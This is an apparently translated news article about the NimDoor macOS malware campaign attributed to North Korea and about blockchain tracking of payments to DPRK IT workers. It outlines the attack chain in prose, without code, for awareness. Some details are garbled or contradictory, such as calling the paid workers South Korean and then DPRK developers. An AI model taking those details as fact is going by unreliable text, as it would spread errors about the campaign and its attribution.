Be Careful! North Korean Hackers Target Mac Users in a Very Creative Way

SentinelLabs, the research and threat intelligence division of cybersecurity company SentinelOne, has investigated a new and sophisticated attack campaign named NimDoor, targeting macOS devices by malicious actors from North Korea. This complex plan involves using the Nim programming language to deploy multiple attack vectors on devices used in small Web3 businesses, which is a recent trend. The self-proclaimed investigator ZachXBT has also discovered a series of payments made to South Korean IT staff, which may be part of this skilled hacking group. How was the attack carried out? The detailed report from SentinelLabs describes a novel and complex method for compromising Mac devices. Start in a familiar way: impersonate a trusted contact to schedule a meeting via Calendly, then the target will receive an email to update the Zoom application. The update script ends with three lines of malicious code that retrieve and execute the stage two script from the controlled server to the legitimate Zoom meeting link. Clicking the link will automatically download two Mac binary files, initializing two independent execution chains: the first file will erase general system information and application-specific data. The second file ensures that the attacker will have long-term access to the affected machine. The attack chain then continued by installing two Bash scripts via Trojan. One script is used to target data from specific browsers: Arc, Brave, Firefox, Chrome, and Edge. The other script steals encrypted data from Telegram and a blob used to decrypt that data. The extracted data is then sent to a controlled server. What makes this approach unique and challenging for security analysts is the use of multiple malware components and various techniques to deliver and masquerade malware, making detection very difficult. Track money ZachXBT, an anonymous blockchain investigator, recently posted on X his latest findings about large payments made to several developers of the Democratic People's Republic of Korea (DPRK) who have been working on various projects since the beginning of the year. He has identified eight workers employed by 12 different companies. His findings indicate that 2.76 million USDC has been sent from Circle accounts to addresses related to developers each month. These addresses are very close to an address that Tether blacklisted in 2023, as it is linked to the alleged mastermind Sim Hyon Sop. Zach continues to monitor similar address groups, but has not publicly disclosed any information as they are still active. He warned that once these workers take ownership of the contract, the underlying project will be at high risk. "I believe that when a group hires many DPRK ITW (IT staff), it is a reasonable indicator that the startup will fail. Unlike other threats to the industry, these employees have little sophistication, so they are mainly a result of the carelessness of the group itself."